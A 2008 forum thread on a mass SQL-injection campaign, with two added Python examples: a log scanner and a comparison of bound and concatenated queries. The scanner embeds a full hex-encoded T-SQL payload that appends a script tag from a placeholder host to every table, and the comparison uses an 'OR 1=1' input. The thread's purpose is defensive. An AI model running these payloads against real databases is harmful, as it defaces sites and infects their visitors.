There is a virus being spread through the use of SQL injection. The SQL injection inserts an iframe which loads a JavaScript file on the visitor's computer and infects the system. If you run a web site, you should look through your logs and traffic to see if there is anything abnormal.
2008-04-28 - No New IIS Or Microsoft SQL Server Vulnerabilities, Despite Claims
http://www.webmaster...net/3636835.htm
2008-04-28 - Half a million sites hit by huge web hack
http://www.techworld...fm?newsid=12100
2008-05-15 - Phishing botnet turns to SQL-injection attack
http://www.techworld...m?newsid=101510
2008-05-05 - Under Attack! Hacker attacked DB with link to virus
http://www.webmaster...net/3641891.htm
2007-11-19 - Avoiding SQL injection attacks without the need to replace words
http://www.webmaster...net/3509272.htm
How To: Protect From SQL Injection in ASP.NET
http://msdn.microsof...y/ms998271.aspx
How To: Protect From Injection Attacks in ASP.NET
http://msdn.microsof...y/bb355989.aspx
Anti-Cross Site Scripting Library
http://msdn.microsof...y/aa973814.aspx
For those of you running an Apache/Linux box, I would HIGHLY recommend installing mod_security with the latest rules.
For the rest of you... fix your damn code.
SQL Injection Affects Half Million Sites
Page 1 of 1 - 10 Replies - 1705 Views - Last Post: 30 May 2008 - 07:33 AM
Replies To: SQL Injection Affects Half Million Sites
#2
Re: SQL Injection Affects Half Million Sites
Posted 27 May 2008 - 03:04 PM
Holy crap!
#3
Re: SQL Injection Affects Half Million Sites
Posted 27 May 2008 - 03:11 PM
We had a few pages in my company's site hit by this and I had to patch it up for them. It essentially injects an SQL statement in binary form, casts it to nvarchar and then executes it. The binary code cast to nvarchar results in a simple insert of a JavaScript src tag.
The way to prevent it is simply to validate URL parameters and make sure that all parameters are of the right size and type. In addition I make sure that parameters are not more than 100 chars in length, which pretty much knocks this SQL injection out because the binary string itself is a few hundred chars.
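The mechanism described in this reply (a hex literal that SQL Server casts to nvarchar and executes) is also what makes the attack easy to spot in web server logs, as the opening post suggests. The following is an added example, not code from the thread: a small scanner that finds the CAST(0x... AS NVARCHAR) pattern in IIS-style log lines, decodes the hex back to the statement the server would have run, and reports the longest parameter value so the 100-character rule from this reply can be checked. The log lines and the decoded statement are constructed for the example (the script host example.invalid is a placeholder); only the decoding step (UTF-16LE for NVARCHAR, one byte per character for VARCHAR) is how SQL Server actually interprets the literal.

```python
import re
from urllib.parse import parse_qsl, unquote

# Hypothetical decoded statement of the kind the thread describes: cursor over
# every user table's text columns and append a <script src> tag to each value.
# Constructed for this example; example.invalid is a placeholder, not a real host.
DECODED_PAYLOAD = (
    "DECLARE @T varchar(255),@C varchar(255) "
    "DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name "
    "FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' "
    "AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) "
    "OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C "
    "WHILE(@@FETCH_STATUS=0) BEGIN "
    "EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(varchar(4000),['+@C+']))"
    "+''<script src=\"http://example.invalid/x.js\"></script>''') "
    "FETCH NEXT FROM Table_Cursor INTO @T,@C END "
    "CLOSE Table_Cursor DEALLOCATE Table_Cursor"
)

# CAST(0x... AS NVARCHAR) interprets the bytes as UTF-16LE, so that is how the
# attacker packs the whole statement into one hex literal.
HEX_PAYLOAD = DECODED_PAYLOAD.encode("utf-16-le").hex().upper()

# Constructed IIS W3C-style log lines, fields in this order:
# date time s-sitename cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
SAMPLE_LOG = "\n".join([
    "2008-05-27 14:02:11 W3SVC1 GET /products.asp "
    "id=12;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x" + HEX_PAYLOAD
    + "%20AS%20NVARCHAR(4000));EXEC(@S);-- 80 - 10.1.2.3 Mozilla/4.0 200",
    "2008-05-27 14:02:12 W3SVC1 GET /products.asp id=12 80 - 10.1.2.4 Mozilla/4.0 200",
    "2008-05-27 14:02:13 W3SVC1 GET /search.asp q=nvarchar%20casting 80 - 10.1.2.5 Mozilla/4.0 200",
])

CAST_HEX = re.compile(r"CAST\(\s*0x([0-9A-Fa-f]+)\s+AS\s+N?VARCHAR", re.I)
MAX_PARAM_LEN = 100  # the per-parameter limit the reply above applies


def decode_hex_sql(hexstr):
    """Recover the text a CAST(0x... AS NVARCHAR/VARCHAR) would produce."""
    if len(hexstr) % 2:
        hexstr = "0" + hexstr  # SQL Server left-pads odd-length binary literals
    raw = bytes.fromhex(hexstr)
    # UTF-16LE-encoded ASCII has a zero high byte in every second position.
    if len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2]):
        return raw.decode("utf-16-le")
    return raw.decode("latin-1")  # VARCHAR cast: one byte per character


def scan_log_line(line):
    """Return a finding for a line carrying a hex-encoded SQL injection, else None."""
    fields = line.split(" ")
    if len(fields) < 9:
        return None
    query = fields[5]
    match = CAST_HEX.search(unquote(query))
    if not match:
        return None
    sql = decode_hex_sql(match.group(1))
    longest = max((len(v) for _, v in parse_qsl(query, keep_blank_values=True)), default=0)
    lowered = sql.lower()
    return {
        "client_ip": fields[8],
        "uri": fields[4],
        "longest_param": longest,
        "decoded_sql": sql,
        "injects_script": "<script" in lowered,
        "touches_every_table": "syscolumns" in lowered or "information_schema" in lowered,
    }


def scan_log(text):
    """Scan a whole log; returns one finding per suspicious line."""
    return [f for f in (scan_log_line(l) for l in text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["client_ip"], finding["uri"],
              finding["longest_param"], "chars in longest parameter")
        print("  decoded:", finding["decoded_sql"][:90], "...")
```

Run it against a real IIS log (adjusting the field order to the site's W3C configuration) and every hit is a request the application must have passed straight into the database; the decoded statement tells you which tables and columns to clean. The length check is a useful triage signal but, as later replies note, not a fix: the fix is binding parameters.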
#4
Re: SQL Injection Affects Half Million Sites
Posted 27 May 2008 - 06:51 PM
None of the sites I know were hit; however, that is a large number.
#5
Re: SQL Injection Affects Half Million Sites
Posted 28 May 2008 - 06:45 AM
We got hit on a site we maintain by this like 5 times. We didn't build the site, and are actually in the process of finishing the redesign, but whoever did left the whole damn site wide open. No validation on query strings. A true pain in the ass. The one we got passed in a hex value that, when converted to ASCII, was an SQL statement that tries to hit every table in the database. <rant>A true pain in the ass, as we were already maxed out on time and now we gotta deal with this because some "knows enough to be dangerous" web developer coded a vulnerability into every page that's been around for years.</rant>
#6
Re: SQL Injection Affects Half Million Sites
Posted 28 May 2008 - 07:43 AM
Thanks for the heads up Chris! I found a kick ass QueryString validation object, it is written in VB.Net so I'm working on converting it to C#, once that is done I will share it in the form of a tutorial or blog post to help people protect their site against these kind of attacks.
#7
Re: SQL Injection Affects Half Million Sites
Posted 28 May 2008 - 09:02 AM
We've been having issues with this.
#8
Re: SQL Injection Affects Half Million Sites
Posted 29 May 2008 - 08:15 AM
SQL injections are the scariest holes out there. They are so common, and are extremely critical.
What I always have to explain to people is that this affects the server level: the attacker is running commands on your SQL server under your privileges.
It's all about escaping the current query, and there are so many vectors and ways to beat filters it's crazy. Especially with MSSQL Server and its xp_cmdshell.
It is very probable that someone could gain root on your SQL server from this vulnerability.
We need to be escaping all variable data that goes into queries. I always build a wrapper into my database abstraction layer for this. Also, use prepared statements as much as possible; this eliminates all of the worry.
Next is something at application level. Like skyhawk said, mod_security works wonders, you just have to be careful. The first time I installed it, I unwittingly grabbed some rules off different sites that were horrible about false positives.
Next, the user you use for your application for your SQL server should have only the permissions needed. That way if you're compromised, they only have a sandbox to play in.
#9
Re: SQL Injection Affects Half Million Sites
Posted 29 May 2008 - 04:00 PM
PsychoCoder, on 28 May, 2008 - 07:43 AM, said:
Thanks for the heads up Chris! I found a kick ass QueryString validation object, it is written in VB.Net so I'm working on converting it to C#, once that is done I will share it in the form of a tutorial or blog post to help people protect their site against these kind of attacks.
Why worry about the strings? Just bind your parameters, and you're fine.
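The two replies above make the same point from different angles: an escaping wrapper in the data layer helps, but binding parameters removes the problem, and validating type and size (as the earlier reply suggested) is cheap insurance on top. The following added example, not code from the thread, shows why with an in-memory SQLite table of constructed rows: a concatenated query, the same query behind a quote-doubling escaper, and a bound query, all fed the same attacker value. The escaper fails because the injected value is numeric and sits in an unquoted position, so there is no quote to escape; the bound query treats the value as data and matches nothing. The table, rows and the `secret` column are constructed for the example.

```python
import sqlite3


def make_db():
    """In-memory stand-in for the site's database; rows are constructed for this example."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, secret INTEGER)")
    conn.executemany(
        "INSERT INTO products VALUES (?, ?, ?)",
        [(1, "widget", 0), (2, "gadget", 0), (3, "internal-only", 1)],
    )
    return conn


def lookup_concat(conn, product_id):
    """Vulnerable: the attacker's text becomes part of the statement the database parses."""
    sql = "SELECT id, name FROM products WHERE secret = 0 AND id = " + product_id
    return conn.execute(sql).fetchall()


def escape_quotes(value):
    """The kind of escaping wrapper a data layer might apply: double every single quote."""
    return value.replace("'", "''")


def lookup_escaped(conn, product_id):
    """Still vulnerable: doubling quotes only protects a quoted string literal,
    and id is compared as a bare number, so 1 OR 1=1 needs no quote at all."""
    sql = "SELECT id, name FROM products WHERE secret = 0 AND id = " + escape_quotes(product_id)
    return conn.execute(sql).fetchall()


def lookup_bound(conn, product_id):
    """Safe: the statement is compiled with a placeholder first, then the value is
    supplied separately and can only ever be compared as data."""
    return conn.execute(
        "SELECT id, name FROM products WHERE secret = 0 AND id = ?", (product_id,)
    ).fetchall()


def lookup_validated_bound(conn, product_id):
    """Type and size check first (the earlier reply's advice), then bind."""
    if not product_id.isdigit() or len(product_id) > 10:
        raise ValueError("id must be a short positive integer")
    return lookup_bound(conn, int(product_id))


# Constructed attacker input: no quotes, so a quote-escaping wrapper changes nothing.
PAYLOAD = "1 OR 1=1"

if __name__ == "__main__":
    db = make_db()
    print("concat :", lookup_concat(db, PAYLOAD))   # every row, including the secret one
    print("escaped:", lookup_escaped(db, PAYLOAD))  # same: nothing to escape
    print("bound  :", lookup_bound(db, PAYLOAD))    # [] : the value is just a string
    print("normal :", lookup_validated_bound(db, "2"))
```

Note that the Python sqlite3 module refuses to run two statements in one `execute` call, so the stacked `;DECLARE ... EXEC(@S)` form from the earlier replies cannot be reproduced here; SQL Server does execute stacked statements, which is exactly why that payload worked. Binding parameters closes both the stacked and the `OR 1=1` forms at once, and a database login restricted to the tables and rights the page actually needs limits what an injection can reach if one slips through.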
#10
Re: SQL Injection Affects Half Million Sites
Posted 30 May 2008 - 07:19 AM
I'm sorry, but this bothers me:
effect: noun, something that happens
affect: verb, to make something happen like above
they are different and not interchangeable, example:
SQL Injection Has An Effect On Half Million Sites -- correct
SQL Injection Affects Half Million Sites--correct
SQL Injection Effects Half Million Sites--incorrect
Cool topic about SQL injections, thanks for the post
Sorry for being a grammar nazi
This post has been edited by KYA: 30 May 2008 - 07:21 AM